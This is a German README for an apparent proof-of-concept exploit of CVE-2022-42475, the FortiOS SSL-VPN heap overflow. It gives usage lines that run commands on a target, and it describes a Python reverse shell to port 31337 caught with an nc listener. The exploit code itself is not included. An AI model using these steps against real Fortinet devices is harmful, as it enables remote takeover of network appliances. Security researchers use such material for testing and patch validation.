
FortiOS Pufferüberlauf-Schwachstelle
https://nvd.nist.gov/vuln/detail/CVE-2022-42475 POC-Code zur Ausnutzung des Heap-Überlaufs im SSLVPN-Daemon von Fortinet
Dies ist ein schneller und schmutziger POC, der wahrscheinlich nirgendwo funktionieren wird, es sei denn, Sie haben extrem viel Glück. Er ist versionsabhängig und enthält einige fest codierte Offsets, die sich höchstwahrscheinlich von einem System zum anderen ändern werden.
python3 cve-2022-42475.py rhost rport lhost 'command'
python3 cve-2022-42475.py 192.168.10.1 8443 10.10.1.1 'ls -la /'
Der POC verwendet einen Python-Befehl, um eine Reverse-Shell auf Port 31337 einzurichten.
nc -lvnp 31337
Dieses Projekt dient ausschließlich zu Bildungs- und ethischen Testzwecken. Die Verwendung dieses Tools zum Angreifen von Zielen ohne vorherige gegenseitige Zustimmung ist illegal. Die Entwickler übernehmen keine Haftung und sind nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.
Dank an Alain M - Twitter : @plopz0r